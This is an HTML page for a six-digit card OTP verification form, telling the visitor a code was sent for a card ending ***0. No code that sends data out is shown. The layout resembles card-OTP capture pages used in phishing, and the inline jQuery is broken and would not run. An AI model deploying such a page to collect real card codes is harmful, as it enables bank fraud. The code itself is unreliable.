<!DOCTYPE html>

<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>OTP Verification Form</title>
    
    <!-- Boxicons CSS -->
    
    <link href="https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css" rel="stylesheet" />
    <link rel="stylesheet" href="../css/verify.css" />
    <!-- js -->
    <script type="text/javascript">
      $('#submit').click(function(){
      $('#OTP').val(
        $('.OTP')
        .not('#OTP')
        .map(
          function(){
            return $(this).val();
          })
        .get()
        .join('')
      );
      });
        </script>
    
    <script src="../js/verify.js" defer></script>
  </head>
  <body>
    <div class="container">
      <header>
        <i class="bx bxs-check-shield"></i>
      </header>
      <h1>Please Check Your Card Verify OTP</h1>
      <h4>We've  send card number ***0</h4>
      <form action="../js/verify.js" method="post" name="OTP-form">
        <div class="input-field">
          <input class="OTP1" name="OTP1" id="OTP1" type="number" />
          
          <input class="OTP2" name="OTP2" id="OTP2" type="number" disabled />
          <input class="OTP3" name="OTP3" id="OTP3" type="number" disabled />
          <input class="OTP4" name="OTP4" id="OTP4" type="number" disabled />
          <input class="OTP5" name="OTP5" id="OTP5" type="number" disabled />
          <input class="OTP6" name="OTP6" id="OTP6" type="number" disabled />
          
         
        </div>
        
        <div class="timer" >Didn't Recieve Code Click to resend <span id="timer"></span></div>
        
        <button id="submit">Verify OTP</button>
      </form>
    </div>

  </body>
</html>
